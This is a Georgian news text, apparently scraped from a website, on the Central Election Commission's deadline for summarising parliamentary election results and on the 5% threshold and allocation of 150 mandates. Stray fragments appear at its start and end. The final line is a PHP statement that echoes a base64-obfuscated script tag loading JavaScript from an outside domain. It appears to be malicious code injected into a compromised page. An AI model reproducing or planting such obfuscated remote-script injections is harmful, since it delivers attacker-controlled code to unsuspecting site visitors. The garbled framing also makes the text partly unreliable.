celsiusi
ავერსი შნაიდერი

 21 ნოემბერია ბოლო თარიღი (არჩევნებიდან არაუგვიანეს 26-ე დღისა), როდესაც ცესკომ საოლქო და საუბნო საარჩევნო კომისიებისგან მიღებული ოქმებისა და სასამართლოს საბოლოო გადაწყვეტილებების საფუძველზე, საპარლამენტო არჩევნების შედეგები უნდა შეაჯამოს და შემაჯამებელი ოქმი გამოაქვეყნოს.

ცესკო არჩევნების საბოლოო შედეგების შეჯამებისთანავე დოკუმენტს საკუთარ ვებ-გვერდზე გამოაქვეყნებს და ასევე, მას გამოსაქვეყნებლად “საკანონმდებლო მაცნეს“ გადასცემს, რომელიც ორი დღის ვადაში გამოაქვეყნებს.
პარლამენტის წევრთა მანდატები იმ პოლიტიკურ პარტიებზე განაწილდება, რომლებიც არჩევნებში ხმების 5%-ს მაინც მიიღებენ. არჩევნებში მონაწილე ამომრჩეველთა ხმების რაოდენობაში ბათილად ცნობილი საარჩევნო ბიულეტენებით გათვალისწინებული ხმების რაოდენობა არ ჩაითვლება.
პოლიტიკური პარტიის მიერ მიღებული მანდატების რაოდენობის დასადგენად მის მიერ მიღებული ხმების რაოდენობა 150-ზე მრავლდება და ყველა იმ პოლიტიკური პარტიის მიერ მიღებული ხმების ჯამზე იყოფა, რომლებმაც არჩევნებში მონაწილე ამომრჩეველთა ნამდვილი ხმების 5% მიიღეს. მიღებული რიცხვის მთელი ნაწილი არის პოლიტიკური პარტიის მიერ მიღებული მანდატების რაოდენობა.
იმ შემთხვევაში თუ პოლიტიკური პარტიების მიერ მიღებული მანდატების რაოდენობათა ჯამი 150-ზე ნაკლები იქნება, გაუნაწილებელ მანდატებს თანამიმდევრობით უკეთესი შედეგის მქონე პოლიტიკური პარტიები მიიღებენ.
არჩევნების საბოლოო შედეგების შეჯამებიდან ორი დღის ვადაში ცესკო არჩეულ პარლამენტის წევრებს რეგისტრაციაში გაატარებს და მათ პარლამენტის წევრად არჩევის დროებით მოწმობას მისცემს.
80
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");